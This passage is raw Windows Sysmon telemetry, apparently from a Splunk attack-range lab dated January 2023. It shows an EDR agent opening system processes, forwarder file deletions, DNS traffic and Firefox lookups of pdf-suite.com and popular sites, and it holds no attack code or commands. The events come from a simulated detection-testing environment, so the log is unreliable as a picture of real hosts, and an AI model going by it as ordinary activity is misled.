Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018902Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.573{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018901Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.564{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018900Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.555{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018899Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.552{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 23542300x800000000000000018898Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.104{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA272060CFF7F2215DF7E4007B9F59FA,SHA256=A64D0731CC0F049D09C00C40274A4AEAB775C69F68633D39CA75C564CEC1F3CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:42.304{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=F184CB017750A15E9189D44DC6C6543B,SHA256=D23D4268F76237AD94FFE42898F654A3839FFACED66D9BDF7A36025D08E5898E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000048475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.470{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local62773- 354300x800000000000000048474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.469{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local57482- 354300x800000000000000048473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.458{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local63902- 354300x800000000000000048472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.458{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64266- 354300x800000000000000048471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.457{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64261- 354300x800000000000000048470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.457{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local62557- 354300x800000000000000048469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.457{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local63612- 354300x800000000000000048468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.456{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local57065- 354300x800000000000000048467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.455{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64821- 354300x800000000000000048466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.454{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local63213- 354300x800000000000000048465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.454{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local58166- 354300x800000000000000048464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.452{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local49284- 354300x800000000000000048463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.451{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60557- 354300x800000000000000048462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.449{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local51270- 354300x800000000000000048461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.448{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local65228- 354300x800000000000000048460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.447{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60726- 354300x800000000000000048459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.445{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local59412- 354300x800000000000000048458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.444{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local59901- 354300x800000000000000048457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.444{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local59063- 23542300x800000000000000048456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:42.153{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\2752s6y5.default-release\cache2\doomed\14968MD5=B32B4DB0D83C469A54713B02654D896F,SHA256=954E7428217118B1636B2D6F8D8385F20AAEC1CF81685FB95E55327192399296,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:42.152{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\2752s6y5.default-release\cache2\doomed\18849MD5=73D250023C385ECB72B190DD9EF0A135,SHA256=51859D67AA18CBAE92CF582892F897D46338863DF20F65CF71BC7BBAF4B980C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018931Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.009{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50198-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018930Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:43.452{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B973661E0F8BA9F0DC60F01B9ACCE739,SHA256=9E06F7E3A01CBED64CB977AC700F46299F10796B304EB507EE4796DF3527725C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048502Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.644{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56504-false10.0.1.12-8000- 23542300x800000000000000048501Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:43.022{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBBD76648FFFDD02187F69AC8A13F408,SHA256=1EC7C62360D11720D2A636B7F296747410081C823DF268BBDEEF7675F7EBE008,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000048500Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.494{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304pdf-suite.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048499Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.481{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304pdf-suite.com064.15.159.239;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048498Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.481{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304www.pdf-suite.com0type: 5 pdf-suite.com;::ffff:64.15.159.239;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.471{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304twitter.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.471{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304reddit.map.fastly.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.470{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304twitter.com0104.244.42.193;104.244.42.129;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.470{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304twitter.com0::ffff:104.244.42.129;::ffff:104.244.42.193;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.469{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304reddit.map.fastly.net0151.101.145.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.468{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304www.reddit.com0type: 5 reddit.map.fastly.net;::ffff:151.101.145.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.468{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304e14801.x.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.467{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304e14801.x.akamaiedge.net0173.222.111.213;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.467{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304www.homedepot.com0type: 5 www.homedepot.com.edgekey.net;type: 5 e14801.x.akamaiedge.net;::ffff:173.222.111.213;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.467{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304dyna.wikimedia.org02620:0:861:ed1a::1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.466{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304dyna.wikimedia.org0208.80.154.224;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.465{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304www.wikipedia.org0type: 5 dyna.wikimedia.org;::ffff:208.80.154.224;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.464{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304star-mini.c10r.facebook.com02a03:2880:f103:83:face:b00c:0:25de;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.463{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304star-mini.c10r.facebook.com031.13.66.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.463{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304www.facebook.com0type: 5 star-mini.c10r.facebook.com;::ffff:31.13.66.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.462{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304youtube-ui.l.google.com02607:f8b0:4009:801::200e;2607:f8b0:4009:802::200e;2607:f8b0:4009:814::200e;2607:f8b0:4009:803::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.460{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304youtube-ui.l.google.com0142.250.190.142;172.217.0.174;172.217.2.46;172.217.4.46;172.217.4.78;172.217.4.206;142.250.191.110;142.250.191.142;142.250.191.174;142.250.191.206;142.250.191.238;142.251.32.14;142.250.190.14;142.250.190.46;142.250.190.78;142.250.190.110;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.460{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304www.youtube.com0type: 5 youtube-ui.l.google.com;::ffff:142.250.190.110;::ffff:142.250.190.142;::ffff:172.217.0.174;::ffff:172.217.2.46;::ffff:172.217.4.46;::ffff:172.217.4.78;::ffff:172.217.4.206;::ffff:142.250.191.110;::ffff:142.250.191.142;::ffff:142.250.191.174;::ffff:142.250.191.206;::ffff:142.250.191.238;::ffff:142.251.32.14;::ffff:142.250.190.14;::ffff:142.250.190.46;::ffff:142.250.190.78;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.459{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304www-amazon-com.customer.fastly.net02606:2cc0:3::374;2606:2cc0::374;2606:2cc0:1::374;2606:2cc0:2::374;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.457{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304www-amazon-com.customer.fastly.net0162.219.225.118;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.457{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304www.amazon.com0type: 5 tp.47cf2c8c9-frontier.amazon.com;type: 5 www-amazon-com.customer.fastly.net;::ffff:162.219.225.118;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000018932Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:44.616{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B84B0A8EE37DCC9FC215FB215B6EA88,SHA256=13948F19AB8456EC8877BA371760AF25D2FFE37924048CDDFE439F7045A683B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048503Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:44.138{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8438DB3E8514EDE233FFA31D50CA31D2,SHA256=F437D29D7340BFE9DDAAB84B5F7930F26C15CCFF73F075EFBED5C75BE729DD63,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018933Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:45.697{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CF3ECA73D676B0CEB4C4822F81476EC,SHA256=B60C4101B40C5A034461D272D3D82B90B218BB9E056C2E3C583C40F5D9CB7626,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:45.275{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CD3CD2E2ED161961E3C31E5BC290CC3,SHA256=E6EB471EE3D39ACE0C2D7BDAC18C3FE02C664C13C03592774C08D7AA0CD5033B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018934Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:46.807{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50B648222590190B7AB6C68B94C451AF,SHA256=40D4C82408BC4876E3D8EB4EE8AB272E48077538D472BDDA2E6E389851492745,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:46.310{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF1CEC216E1B73EE344882A5B4AF7862,SHA256=23FC6F65377462CDFFF6DEA28871BC84A63799052F7E1367F5BF9FE857A06668,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018935Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:47.921{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16E52F649AD1030BE5461A6A9101147A,SHA256=BAB240059B39BD02595E3F8FA693B35D940D76F2D1566261BB8B4C1A64E60FE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:47.358{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9632E6CB2C201182756519B2F7E1B76B,SHA256=FA0CA537E530AD61552FE105CF5CCD94BD71E7CBD02E464D58D6F0F3AE6495EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018936Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 